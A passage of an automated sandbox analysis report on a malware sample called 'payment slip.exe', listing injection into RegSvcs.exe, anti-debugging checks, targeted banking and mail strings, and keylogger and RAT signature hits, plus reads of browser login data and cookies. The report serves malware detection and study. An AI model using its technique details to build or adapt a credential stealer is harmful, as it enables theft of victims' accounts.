                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_000A5C97
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594954Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594704Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594082Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593954Jump to behavior
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                  Source: RegSvcs.exe, 00000002.00000002.3838901959.00000000007D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                  Source: RegSvcs.exe, 00000002.00000002.3841238839.00000000037DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_05F49548 LdrInitializeThunk,2_2_05F49548
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000AEAA2 BlockInput,0_2_000AEAA2
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00062622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00062622
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00054CE8 mov eax, dword ptr fs:[00000030h]0_2_00054CE8
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_03B03500 mov eax, dword ptr fs:[00000030h]0_2_03B03500
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_03B034A0 mov eax, dword ptr fs:[00000030h]0_2_03B034A0
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_03B01E70 mov eax, dword ptr fs:[00000030h]0_2_03B01E70
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00090B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00090B62
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00062622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00062622
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0005083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0005083F
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000509D5 SetUnhandledExceptionFilter,0_2_000509D5
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00050C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00050C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\payment slip.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\payment slip.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3E7008Jump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00091201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00091201
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00072BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00072BA5
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0009B226 SendInput,keybd_event,0_2_0009B226
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000B22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_000B22DA
                  Source: C:\Users\user\Desktop\payment slip.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\payment slip.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00090B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00090B62
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00091663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00091663
                  Source: payment slip.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: payment slip.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_00050698 cpuid 0_2_00050698
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000A8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_000A8195
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0008D27A GetUserNameW,0_2_0008D27A
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_0006B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0006B952
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_000342DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: payment slip.exe PID: 6736, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1104, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: payment slip.exe PID: 6736, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1104, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: payment slip.exeBinary or memory string: WIN_81
                  Source: payment slip.exeBinary or memory string: WIN_XP
                  Source: payment slip.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: payment slip.exeBinary or memory string: WIN_XPe
                  Source: payment slip.exeBinary or memory string: WIN_VISTA
                  Source: payment slip.exeBinary or memory string: WIN_7
                  Source: payment slip.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: payment slip.exe PID: 6736, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1104, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000002.00000002.3839548945.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: payment slip.exe PID: 6736, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1104, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.580000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.payment slip.exe.3b10000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.payment slip.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3838254770.0000000000582000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1389745907.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: payment slip.exe PID: 6736, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1104, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\payment slip.exeCode function: 0_2_000B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_000B1204
